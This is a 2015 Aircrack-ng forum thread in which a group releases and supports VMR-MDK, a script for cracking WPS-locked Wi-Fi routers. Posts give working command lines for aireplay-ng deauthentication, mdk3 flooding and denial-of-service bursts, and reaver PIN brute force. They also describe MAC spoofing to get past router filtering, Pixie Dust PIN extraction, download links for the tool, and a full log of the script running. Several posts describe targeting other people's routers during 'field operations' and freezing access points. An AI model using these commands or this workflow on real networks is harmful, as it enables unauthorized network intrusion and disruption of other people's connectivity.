Aircrack-ng forum

General Category => Useful stuff => Topic started by: musket33 on January 07, 2015, 12:11:56 pm

Title: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on January 07, 2015, 12:11:56 pm
VMR-MDK-K2-011x8.sh for Kali2.0

Musket Teams have voted to release the following WPS Locked Intrusion Script for General Use:

Included in the VMR-MDK package

1. mdk3-v6 folder
2. configfiledetailed for reference only
3. Help Files
4. PDDSA-K2-06.sh
5. VMR-MDK-K2-2016R-011x9.sh

For Kali 1.10a

Loaded 8 March 2016
Download VMR-MDK011x8 package at:

http://www.datafilehost.com/d/4f95b97f

For kali 2.0 and 2016.1R

You can download VMR-MDK-K2-2016R-011x9.zip package at

Loaded 8 March 2016
http://www.datafilehost.com/d/c2a2b474


MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: misterx on January 08, 2015, 03:40:59 am
The file does not exist.
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: Unknown on January 08, 2015, 08:32:37 am
The file does not exist.

I saved it yesterday, but be carefull i dont had the time to check it:

http://www.file-upload.net/download-10111196/VMRMDK-150107.zip.html
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on January 08, 2015, 08:33:43 am
We have found an error in one(1) configuration file named:

     configfiledetailed1x2

You can REM/COMMENT out with a # the following two(2) variables

USE_PIN1=  should read #USE_PIN1=
WPS_PIN1=  should read #WPS_PIN1=


or you can download the corrected version


New Download

http://www.datafilehost.com/d/18156813

Musket Teams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: misterx on January 09, 2015, 04:31:35 am
You should upload it here, that would be easier.
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: madafakaz on January 09, 2015, 10:19:19 pm
any ideas how to properly authenticate with a routers that throw Association denied (code 18) error ? reaver does nothing, aireplay gives code 18 if try to use it as external authentication.

someone mentioned the same issue but there was no progress/solution posted so far. http://code.google.com/p/reaver-wps/issues/detail?id=377
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on January 10, 2015, 06:25:10 pm
Sorry Mr X we simply did not know a download facility was available.

We have included the attachment here.

MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on January 12, 2015, 02:55:57 pm
To madafakaz

Mteams have used the following three aireplay-ng and mdk3 commands to try and activate the router to respond to reaver:

aireplay-ng -0 10 -a XX:XX:XX:XX:XX:XX mon0

aireplay-ng -1 20 -a XX:XX:XX:XX:XX:XX -q 10 mon0

mdk3 mon0 f  -t XX:XX:XX:XX:XX:XX -f 99:99:99

We also suggest you use the following long reaver command line suggested by the author of auto-reaver

reaver  -i mon0 -a -f -c 1 -b XX:XX:XX:XX:XX:XX -r 3:10 -E -S -vv -N -T 1 -t 20 -d 0 -x 30

If you spoof your mac in reaver, change it from the command line first and only then add the --mac=XX:XX:XX:XX:XX:XX to the reaver command line otherwise reaver will fail.  Make sure the mac you spoof is the same as the mac in your command line.
MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on February 05, 2015, 01:45:51 am
Reaver tools - aireplay-ng fakeauth and mdk3 MAC Filter brute force restart.

   The following bash script has been rereleased for public use. This simple program is designed to be used with reaver to activate router response to a reaver request for pins.
    The script assumes a reaver attack is in progress and the user has already placed the wifi device in monitor mode thru airmon-ng.


Musket Teams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: pedropt on February 07, 2015, 09:13:28 pm
Your script is interesting , i will give you an idea for you to apply in the next version :

- Some aps have Mac address filtered , to bypass this you can put airodump listening to that particular AP and look for connected clients , then you can pick the mac address of that specific connected client and change mon0 mac address to that client mac address .

As soon as i remember more i will write them down here .

Note : try to change the configuration in script the varmac_config folder to script folder , it is anoying to have the script in :
/root/tools/wifi/vmrmdk

and the varmac_config folder in :
/root/varmac_config/
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: Atmadja on February 23, 2015, 07:14:09 am
Hy, thanks for your job, it seems to work for me !!  :)
I'm at 8% now, hope it will found the right pin before one month ^^
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on February 24, 2015, 12:32:18 pm
To Atmadja

    Note the following:

    You have found a WPS Locked router that is susceptible to this apporach.

     Note the first six hex digits of the routers BSSID there is a good chance other routers with this hex sequence are also vulnerable.  This has been the case in areas we do field operations in.

     Do not be surprised if the pin completion jumps  suddenly to 91%

     Read our steps should your  pins spin endlessly at 99.99%

     It may take a few weeks so give it time to work.

     MTeams

     
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on February 24, 2015, 02:32:48 pm
To pedropt
     
     As we note in the help files, you can run the script from root or place it in the user/bin folder and run it from the command line. We only support kali-linux distros.

      AS to mac spoofing - we have never seen a single case where reaver was blocked by mac filtering. That being said we cannot prove that a routers lack of response was due to mac filtering by the router. We have tested  this by spoofing the mac of associated clients but this did not change the routers lack of response to reaver. For this reason we did not include the ability to select a specific mac address.

       MTeams would be interested in any view you have on this subject.
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: pedropt on February 25, 2015, 06:46:39 pm
About the MAC spoof it already happened to me 3 times , the situation is that some people configure their APS to get accessed only by their only configurable MAc addresses (TVS , Phones , LAptops) , and no matter what you try to do with aireply  , it will not get an authentication due the fact that every mac address generated does not match with the configured ones on the router .
For those cases i have to wait and see witch mac addresses do the handshake and stay connected , and then i have to change mon0 to one of those mac addresses so i can be authenticated with the router .
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: Atmadja on February 27, 2015, 11:29:23 am
Code: [Select]
[code]I had a problem yesterday, the script was working normaly and suddently something happened and kali wrote a 100G file "xsession-error" so the partition gone full.
After deleting this file, I restarted your script but reaver started from 0%.
Thank's to the logs, I knew that the attack stopped at pin 1190XXXX.
So I entered "1190" in the first line of /etc/reaver/"bssid".wpc.
After restarting the script, reaver continues testing from 10% but it test pins like this :
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Entering recurring delay of 15 seconds
[+] Trying pin 1375
8
[+] Sending EAPOL START request

Do you have an idea for why does it test a 4digits pin only? and what is this "8"?

Thank you your help and nice job again :)
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: Atmadja on March 02, 2015, 10:35:28 am
I've resolved the problem by deleting the wpc file and create a new one with "1190" at the first line.
I think the problem was that the wpc file was corrupted during the memory problem.

Hope it will help someone in my case  :)
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on March 06, 2015, 01:14:13 pm
Sorry for not answering but we only just saw your comments. In truth we woud have been of little help as we have never seen this problem before. We found your rewrite of the wpc file interesting.

MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on March 06, 2015, 01:27:15 pm
To Pedropt,

     Reference setting a specific mac address - as you have noted that this problem can exist, we are looking into adding this ability into the script. We will advise here when completed.
 
MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on April 04, 2015, 01:07:46 pm
As working pixie-dust programs are becoming available MTeams suggest referencing the pixie dust threads in kali-linux forums. As VMR-MDK009x2 can force some routers to respond to reaver,  running a pixie-dust attack in the background could obtain the WPS pin in less hen three minutes. This pin could then be loaded into the VMR-MDK009x2 script this reducing cracking time considerably.

 
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: pedropt on April 04, 2015, 02:28:23 pm
your script is good in the attack mode  one AP i was trying to crack manually  , but i couldn`t because that specific AP needed to be restarted , i used your script , i could not get the wps but your script was able to freeze the AP , i know that because i did not saw the AP online after 1 hour of banging it with mdk .
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on April 07, 2015, 10:38:11 am
To pedropt

    VMR-MDK009x2 is designed to be used against routers that show a locked state but give up some pins and then when hit with mdk3 allow another round of pin harvesting.

    We are currently rewriting to allow the assignment of a specfic mac address and include pixiedust into the routines.


    You might also look at ReVdK3r2.sh. See kali-linux forums for the download. There may be a latter version. As we are not the authors we are unsure of the latest version.


MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on April 29, 2015, 02:15:28 am
  Musket Teams have voted to released their Pixie Dust Data Sequence Analyzer PDDSA-01.sh for general use. This script was originally written to work with VMR-MDK009x2.sh, a WPS locked intrusion script. But it can work with any text file output from modded reaver programs showing both PKE and PKR.

  PDDSA-01.sh simply reads any data output in text format from a modded reaver program, looks for valid Pixie Dust Sequences and extracts the pin using pixiewps. No cut and paste. You can check all the sequences in the file or just one. After the first valid sequence is found the program can cycle thru all the other sequences as required.

  If you are not using VMR-MDK009x2 then simply use the command line:

    reaver -i mon0 -a -f -c 1 -b 55:44:33:22:11:00 -vv | tee /root/VARMAC_LOGS/targetAP         

  The reaver command line side can be altered as required however the -vv must remain or
 data will not be written.

  There is a help file in the download.

PDDSA-01.sh and PDDSA-02.sh are withdrawn

PDDSA-05.sh which supports brute forcing a wps pin when using pixiewps1.1 by wiire is available at
http://www.datafilehost.com/d/8986ce13


MTEAMS
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on April 29, 2015, 11:59:28 pm
To pedropt

   MTeams has been sidetracked with Pixie Dust however we are again turning our attention to the mac address matter you have raised. And are looking for some input from you.

   When VMR-MDK009x2.sh runs it sets up three(3) monitors  mon0, mon1 and mon2 for use by mdk3. Would you prefer:

Currently all three(3) are assigned random mac addresses

We can allow other choices;

1.  mon0 has the abiliy to have a mac address assigned while mon1 and mon2 are random
2.  mon0 mon1 and mon2 are assigned a single mac address by the user
3.  mon0 mon1 mon2 are assigned individual mac addresess by the user.


Keep in mind that mon1 and mon2 are only used by mdk3 during the DEAUTH process. While mon0 is used by wash, reaver and mdk3.

MTeams
   
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on May 10, 2015, 09:53:20 am
  Musket Teams have released their lab version of Pixie Dust Data Sequence Analyzer PDDSA-06.sh for general use. This script requires the installation of pixiedust1.1 by wiire and has been updated to allow for the more advanced features of version 1.1 such as brute forcing the WPS Pin

   Script supports the latest pixiedust modded reaver program from from t6_x and datahead and soxrok2212 as of 11 May 15. Older modded reaver programs are not supported. See kali-linux forums for latest.


You can download at

http://www.datafilehost.com/d/a30c5b3d

or the attachment below.

MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on May 13, 2015, 12:24:28 am
To Pedropt:

     We have duplicated your findings respect to mac address spoofing and the collection of WPS Pins with reaver. Well done and thank you!!!

     For WPS Locked routers that are susceptible to VMR-MDK009x2.sh - pin harvesting immediately commenced when we spoofed the mac adddress of a connected client.

      We will send you a beta version called VMR-MDK009x5.sh to you if you wish. Write us thru kali-linux. See mmusket33.

       However if you have updated to the newer airmon-ng do not bother. Due to limits imposed by the newer version the program will not function. It may be a while before we load the newer version of aircrack-ng onto another computer and find a way around the newer version of airmon-ngs' limitations.

MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: silense on June 15, 2015, 01:12:17 am
try -p 1357@@@@
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on August 01, 2015, 03:42:50 am
To pedropt

    Our latest VMR-MDK script has been released. Included are your suggestions concerning MAC addresses. See beginning of this thread for download address and thanks again for your input.

MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: Matt on August 24, 2015, 09:15:43 am
I followed the instructions in the help files, but make doesnt seem to build anything says the program doesnt exist. Am I doing something wrong here?
Quote
oot@acorn:~# cd /root/mdk3-v6/
root@acorn:~/mdk3-v6# make
make -C osdep
make[1]: Entering directory '/root/mdk3-v6/osdep'
Building for Linux
make[2]: Entering directory '/root/mdk3-v6/osdep'
make[2]: '.os.Linux' is up to date.
make[2]: Leaving directory '/root/mdk3-v6/osdep'
make[1]: Leaving directory '/root/mdk3-v6/osdep'
root@acorn:~/mdk3-v6# make install
make -C osdep install
make[1]: Entering directory '/root/mdk3-v6/osdep'
Building for Linux
make[2]: Entering directory '/root/mdk3-v6/osdep'
make[2]: '.os.Linux' is up to date.
make[2]: Leaving directory '/root/mdk3-v6/osdep'
make[1]: Leaving directory '/root/mdk3-v6/osdep'
install -D -m 0755 mdk3 //usr/local/sbin/mdk3
root@acorn:~/mdk3-v6# chmod 755 /root/mdk3-v6/*
root@acorn:~/mdk3-v6# /root/mdk3-v6/mdk3
bash: /root/mdk3-v6/mdk3: No such file or directory
root@acorn:~/mdk3-v6# mdk3
bash: /usr/local/sbin/mdk3: No such file or directory

And yes there is a file within /user/local/sbin/mdk5 as well
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: misterx on August 24, 2015, 06:08:07 pm
Have you tried just typing mdk3 as root (and not the full path)?
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: SilentMatt on August 24, 2015, 10:27:20 pm
Have you tried just typing mdk3 as root (and not the full path)?
Yes, I've tried every which way to launch it. I've tried to do this via kali 1.1.0a and 2.0.   Kali 1.1.0a was a fresh install too.

Quote
root@acorn:~# mdk3
bash: /usr/local/sbin/mdk3: No such file or directory
root@acorn:~# cd /usr/local/sbin/
root@acorn:/usr/local/sbin# ls -la
total 376
drwxrwsr-x  2 root staff   4096 Aug 24 05:08 .
drwxrwsr-x 10 root staff   4096 Aug 12 01:18 ..
-rwxr-xr-x  1 root staff 374518 Aug 24 05:08 mdk3
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on August 28, 2015, 12:32:51 pm
To Silent Matt

     You can only use this version of VMR-MDK with versions up  to kali 1.10a. Kali 2.0 does not support Eterm and some folders have been changed among other things.

     We have a VMR-MDK Kali2.0 version under test at this time. MTeams will probably release it within a month. We will post the release download here and at kali linux forums. This version is plug and play as all he dependencies are loaded to include the newer mdk3 attack.

     Now respect mdk3 that supports Invalid ESSID. Kali 1.10a already has an mdk3 program installed. Follow the instructions in the help file and you will install another version to root

    The helpfiles show you how to test the install. If you pick Invalid ESSID as an attack in the config file then VMR-MDK accesses this folder in root.

     You can run VMR-MDK without this feature working.

      MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on September 08, 2015, 11:46:18 pm
A kali-linux 2.0 version has been released. See top of this thread for download addresses for both kali2.0 and kali 1.10a or lower.

Musket Teams(STO)
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: rostar99 on September 13, 2015, 07:51:42 pm
To silent matt (and anyone else having the "No such file or directory" error when trying to run mdk3)
If you are running Kali amd64 you might be missing the necessary x86 libraries to support x86 processes.
See http://askubuntu.com/questions/133389/no-such-file-or-directory-but-the-file-exists (http://askubuntu.com/questions/133389/no-such-file-or-directory-but-the-file-exists)

Particularly "64 bit Ubuntu Multiarch systems" answer. This is what I did to fix issue.
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: mrmasonman on September 15, 2015, 12:31:58 am
Hi musket33,

    installed your vmr-mdk-kali2 in my root folder and in stalled it,it starts up and goes the whole process ,but when it starts readind the aps it reads ok,but theres another window saying found packets with bad fcs,skipping,so even if i press yes to see my list there is no window that shows up with my list of aps,i have kali 2 in live mode,i dont have it installed because of the login probs,thnx for any advice guys.:)
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on September 16, 2015, 05:35:22 am
You should not run this program in Live mode. These attacks can take a long time sometimes weeks. You need to store then data you have collected. Making a persistent usb is really easy. Go to the how to section in kali. MTeams has three tutorials. We even show you how to enable persistence when only windows is available.

Now to your problem:
Each xterm window has a heading. From the data you said was in the window you are looking at the wash scan. You are probably using a wifi device that doesnot support packet injection.

MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: rho on October 30, 2015, 09:49:24 pm
Hey MTeam,
Thankyou for all the awesome work.
I got the mdk3-v6 script, got everything to run on kali2.0 with the new airmon-ng
so im unable to set virtual monitor modes due to the limitations.. And I understand due to the new airmon-ng

-However, on running mdk3 - Now im getting an error : on both my wifi chipsets pci-e Atheros 9285X as well usb Atheros 9271
Quote
Ndiswrapper doesnt support monitor mode.
..
edit: However, on extensively searching, I figured, I should not be getting this error, as Im using ath9k drivers, and BT/Kali disregarded ndiswrapper ages ago, as they never supported monitor mode, never will..

next question
Im trying to reset/mdk my cisco linksys e900 router v1 FW 1.00.00.01, which locks up for 60 seconds after every 5 successful incorrect pins, then for 15 seconds for the next  incorrect pin - and this cycle continues.. (Yes I know its weird, but Its happening)
So How do I use the MDk3 script to run along with reaver ?
Im eager to try this - but presently mdk3 is completely broken..

-Also, Is it possible for the PKR value(s) - of the same router to change ?
My e900 - happened to have a PKR value the first time I used reaver against it.. Was something else the next time, and now its 00:00:00:00:00......:00:00:00:02 (yes all zeroes and two).
I noticed this As I tried inputting the values manually in PixyWps

Kind Regards

===========

EDIT : disregard the above error.. restarted machine. works fine. now testing modes.

===========

Edit 2 : Tried this on a d-link router - rtl 8xxx chipset [2.4 + 5ghz mimo] - wps locked
mdk3 wlan0mon a -n xx:xx:xx:xx:xx:xx (in one term initially, then 2 terms, then 3 terms) for an hr

2-3 times 19.5k clients connected - NO Effect
the term window did mention Ap seems to have frozen, Ap back up again..
But on checking via another machine - Airodump and browsing in general.. no effect

Same for linksys e2500 and linksys e900 - no effect
(have physical access to all 3 AP's, all wps locked)

Also - The TKIP -m mode has no effect whatsoever.

Point me in the right direction if Im doing something wrong

thx

Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on November 01, 2015, 02:15:49 am
To rho

     We answered you in kali-forums. However with your new questions.

1. VMR-MDK approach only works with some routers. As mentioned in the help files, for VMR-MDK to work you should see the following response from the router:

1. Collect some pins then the router locks its WPS system.

2. With the routers' WPS system locked, hit it with VMR-MDK DDOS try type 3,4 or 14  for about 15 to 20 seconds only, then rest for about 120 seconds and then try collecting WPS pins again. If you collect more pins after a short mdk3/DDOS burst then you will eventually crack the router.

If you apply to much mdk3 then the router might crash and you will have to wait.

In some cases routers are not affected by DDOS processes. VMR-MDK then will not work.

The tkiptun-ng approach is experimental. We added it after it broke a router that never ever responded to any reaver attack for over a year. But after leaving tkiptun-ng running thru VMR-MDK for over 12 hours overnight, we found in the morning the WPA key was broken thru only one cycle of reaver during one of the cyclic VMR-MDK attacks during the 12 hr period. As noted in some cases if the router gets hit with small amounts of MDK3 repeatedly it may reset its WPS  pin to 12345670. This is why we added the retest 12345670 feature to the VMR-MDK menu as we have seen this to occur repeatedly.

In closing we have never found that a complete reseting of routers ever worked in our areas of operation.  And we again refer you to the extensive help files. VMR-MDK is not a magic bullet just one tool in the WPA cracking processes.
MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on November 01, 2015, 02:26:50 am
To rho

     We answered you in kali-forums. However with your new questions.

1. VMR-MDK approach only works with some routers. As mentioned in the help files, for VMR-MDK to work you should see the following response from the router:

1. Collect some pins then the router locks its WPS system.

2. With the routers' WPS system locked, hit it with VMR-MDK DDOS try type 3,4 or 14  for about 15 to 20 seconds only, then rest for about 120 seconds and then try collecting WPS pins again. If you collect more pins after a short mdk3/DDOS burst then you will eventually crack the router.

If you apply to much mdk3 then the router might crash and you will have to wait.

In some cases routers are not affected by DDOS processes. VMR-MDK then will not work.

The tkiptun-ng approach is experimental. We added it after it broke a router that never ever responded to any reaver attack for over a year. But after leaving tkiptun-ng running thru VMR-MDK for over 12 hours overnight, we found in the morning the WPA key was broken thru only one cycle of reaver during one of the VMR-MDK attacks sometime during the 12 hr period. If VMR-MDK cracks the WPA key then the program stops with the key on the screen. As noted in some cases if the router gets hit with small amounts of MDK3 repeatedly, it may reset its WPS  pin to 12345670. This is why we added the retest 12345670 feature to the VMR-MDK menu as we have seen this to occur repeatedly.

In closing we have never found that a complete reseting of routers ever worked in our areas of operation.  And we again refer you to the extensive help files. VMR-MDK is not a magic bullet just one(1) tool in the WPA cracking processes.
MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: tdv281 on November 21, 2015, 05:53:44 pm
To musket33
I did same as your instruction file, but after terminate the first cycle, the program stop and appear the command like in the attachment file. Please help me on this. I'm using kali 2.0 with installed program: reaver t6x, pixie dust 1.1, mdk3 and aircrack-ng. All of that has been updated to the latest version. Thanks and hope you could help me.
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on November 22, 2015, 11:23:29 am
To tdv821

    We tried to duplicate your problem and couldnot.

    You are getting an airmon-ng warning when entering data incorrectly. Make sure you remove any monitors like wlan0mon etc  manually before running, We have had reports that if you enter the device wlan0 or mon0 rather then the line number this can occur but when we try this the program just stops.

    You might reboot the computer plug in the wifi device and run the program.

    We have not tested this program using vmware. 
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: brunoaduarte on November 25, 2015, 04:16:11 am
Hi musket33,

Is it possible to run VMR-MDK on a Raspberry Pi running Raspbian ?

I've got everything working fine (aircrack, reaver 1.5.2, pixiewps, wash, etc).

Thanks
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on November 25, 2015, 01:43:44 pm
You coulld try running it. We know nothing about your OS. You could just download kali2.0 and make a persistent USB install of kali and run it from a flash drive. In Kali linux forums MTeams have posted step by step procedures for setting up a persistent usb.  Just do not try and run it from a live only non persistent usb.

MTeams
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: brunoaduarte on November 25, 2015, 02:29:57 pm
Ok, i'll try to run it on Raspbian (Debian based) Raspberry OS.

There's a version of Kali for Raspberry (ARM), but it doesn't have the drivers for my MT7601U USB wireless dongle, and i was not able to compile it's firmware.

Anyway, thanks ! I'll post here if it worked.
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: musket33 on November 26, 2015, 04:21:02 am
Mteams will try and help you get it running. We suspect even if you have all the drivers and programs you are going to get folder warnings especially when you run reaver as the program refers to locations that may not exist in your operating system. You will find the --session= command in the reaver command lines. And these locations may not exist in your OS. Furthemore alot of the setups use locations in kali to store text files temporarily. Again the persistent usb solution will be far easier.
Title: Re: Cracking WPS Locked Routers using aireplay-ng,mdk3,reaver and wash
Post by: brunoaduarte on November 26, 2015, 01:52:07 pm
I've tested it here, seems to work ok !

I just needed to install some extra dependencies that were not installed by default in Raspbian: xterm, rfkill and macchanger.

Here's how to make it work on Raspberry Pi running Raspbian:
------------------------------------------------------------------------

Code: [Select]
pi@raspberrypi ~ $ sudo su
root@raspberrypi:/home/pi#

#Install needed dependencies
apt-get update && apt-get install libpcap-dev libssl-dev libsqlite3-dev xterm rfkill macchanger -y

#Install Pixiewps
git clone https://github.com/wiire/pixiewps.git
cd pixiewps/src
make && make install

#Install Reaver 1.5.2
git clone https://github.com/t6x/reaver-wps-fork-t6x
cd reaver-wps-fork-t6x*/src/
./configure
make && make install

Then just follow tutorial from VMR-MDK help file.

* If there are problems running 'xterm' as root, fix using these steps (couldn't paste the original link here cause it detected as spam):
Code: [Select]
Tuesday, January 7, 2014
X11 doesn't work with sudo su -
Here is the situation:

login as: pkg
Using keyboard-interactive authentication.
Password:
Last login: Tue Jan  7 22:02:07 2014 from l2554
Kickstarted on 2012-10-19
/usr/bin/xauth:  creating new authority file /home/pkg/.Xauthority

[pkg@mdc3 ~]$xterm - works
[pkg@mdc3 ~]$sudo su -

[root@mdc3 ]# xterm - doesn't work
PuTTY X11 proxy: wrong authorisation protocol attemptedWarning: This program is an suid-root program or is being run by the root user. The full text of the error or warning message cannot be safely formatted
in this environment. You may get a more descriptive message by running the
program as a non-root user or by removing the suid bit on the executable.
xterm Xt error: Can't open display: %s


Here is what you have to do
su - pkg -c "xauth list"  | xargs -n 3 xauth add


Basically we have to add the xauth created by user "pkg" to this new user "root"

[pkg@mdc3vr1138 ~]$ xauth list
mdc3vr1138/unix:10  MIT-MAGIC-COOKIE-1  d9241397a36b9ecc2cb03b07addf4008

[root@mdc3vr1138 ~]# xauth add mdc3vr1138/unix:10  MIT-MAGIC-COOKIE-1  d9241397a36b9ecc2cb03b07addf4008

And here's the full log of it running:

Code: [Select]

=~=~=~=~=~=~=~=~=~=~=~= PuTTY log 2015.11.26 12:01:21 =~=~=~=~=~=~=~=~=~=~=~=
login as: pi
pi@192.168.1.119's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Nov 26 14:00:05 2015


pi@raspberrypi ~ $ sudo su

root@raspberrypi:/home/pi# cd
root@raspberrypi:~# airmon-ng check kill
root@raspberrypi:~# ./VMR-MDK-K2-011x8.sh

 VMR-MDK-K2-011x8.sh(Kali2.0 Only)

                            |||||||||||||||||||||||||
                            || WPS PIN  JAIL BREAK ||
                            |||||||||||||||||||||||||

            In Memory of Alan M. Turing and the work of Betchly Park
    If you eliminate the wrong solutions you are left with the right answer.

                 All Thanks To Vulpi, Wn722, Slim 76, Soxrok2212

                       Inspired By The Band SRC
                      Next To Milestones On The Plain Of Jars
                        In Undertaking This Work We Were
                  Up All Night Near The Hall Of The Mountain King

                    A Musket Team Special Case WPS Pin Harvester
                           !!!!USE WITH KALI 2.0 ONLY!!!!
             Read Help Comments in configfiledetailed Before Employing

     --> MANUALLY REMOVE THRU A TERMINAL WINDOW ANY MONITORS MADE WITH<--
     --> THE NEWER AIRMON-NG (i.e. wlan0mon etc) BEFORE PROCEEDING <--
     --> Network Manager will be stopped to allow reaver to function<--
                              Press (y/Y) to continue....
         Press (n/N) to abort!!..Press any other key to try again:
y
  You entered y.  Continuing ...


  Clearing ALL monitors, reaver, wash, mdk3 and aireplay-ng etc - please wait.
    Shutting down network-manager


InterfaceChipsetDriver

wlan0Unknown mt7601u - [phy0]

Interface



InterfaceChipsetDriver

wlan0Unknown mt7601u - [phy0]


 Devices found by airmon-ng.
 
       1: wlan0

    Enter the line number of the wireless device (i.e. wlan0, wlan1 etc) to be used.
  Device must support packet injection.

   Enter Line Number Here: 1


  You entered wlan0 type (y/Y) to confirm or (n/N) to try again.
y

    Do you wish to boost your wifi device power to 30dBm?
  This routine works for the AWUSO36H and
  may work with other devices.
  Type (y/Y) for yes or (n/N) for no.
n



InterfaceChipsetDriver

wlan0Unknown mt7601u - [phy0]
mon0Unknown mt7601u - [phy0]


 Devices found by airmon-ng.
 
       1: wlan0
       2: mon0

    What wireless monitor interface (i.e. mon0, mon1) will
  be used by reaver?

   Enter Line Number Here: 2


  You entered mon0 type (y/Y) to confirm or (n/N) to try again.
y
    Running wash scan target for targetAP selection.

                         FOR AUTOMATIC ENTRY

    When scan is complete and targetAP's seen enter (y/Y) to continue...
   Program will display AP list and load selected target data automatically.

                          FOR MANUAL ENTRY
                          (Special  Cases)

    If targetAP has a hidden ESSID(i.e. no AP name seen) or,
  targetAP NOT FOUND you may enter information manually.
  Enter (m/M) to enter the AP name, mac address and channel manually.

   [y/Y] To select targetAP from a wash  scan list of APs seen enter: [y/Y]

   [m/M] To enter targetAP data manually (i.e. special cases) select: [m/M]

     Enter y/Y or m/M
y

    You have chosen y.

 Enter (y/Y) to confirm or (n/N) to try again.
y
 

 TargetAPs found by wash.
 
       1: targetap   
 
      !!! A specific config file will be written for each target !!!

     When the targetAP is selected, the script will write a configuration
  file to the /root/VARMAC_CONFIG/ folder. The file name will be
  the AP name(ESSID) followed by the mac address(BSSID). If the file exists,
  the file will NOT be overwritten.
     Using individual files for each target will avoid conflicts with reaver
  and help keep attack parameters consistent. For example, using and
  then not using  --dh-small/-S will cause reaver to reset the pin
  count. The entire attack will be restarted and all previous work will be
  lost.


   Enter Line Number of Selected TargetAP Here: 1




    You have chosen:

      1.  targetap as the targetAPs' name.

      2.  XX:XX:XX:XX:XX:XX as the targetAPs' mac address.

 Enter (y/Y) to confirm or (n/N) to try again.
y
 

 Configuration files listed in the VARMAC_CONFIG folder.
 
       1: configfiledetailed
       2: targetap-FFFFFFFFFFFF

     Select the config file to be used.
  A Configuration file targetap-FFFFFFFFFFFF has been made for use
  with this target BUT any config file listed can be used.
  After selection the config file parameters will appear. You can review
  settings and make changes which will be written to the file choosen.

     Once the program is running, open the config file with leafpad,
  make any changes and save. The config file is loaded at the start of
  Stages II, III & IV.

   Enter Line Number of Config File Here: 2



    You have chosen targetap-FFFFFFFFFFFF as your configuration file.
 Enter (y/Y) to confirm or (n/N) to try again.
y

    Check Entries - To change, enter the line number of the parameter to alter and
  follow program prompts. The entry changed will be written to targetap-FFFFFFFFFFFF.

  1) Channel 0 (Zero in almost all cases)   default= 0   [ 0 ]
  2) Use -r x:y with reaver (y/n)           default= y   [ y ]
  3) x in -r x:y (number of times)          default= 2   [ 2 ]
  4) y in -r x:y in sec                     default= 15  [ 15 ]
  5) Reaver Live Time in sec(Stage II)      default= 120 [ 120 ]
  6) Use Long Reaver Command y/n            default= y   [ y ]
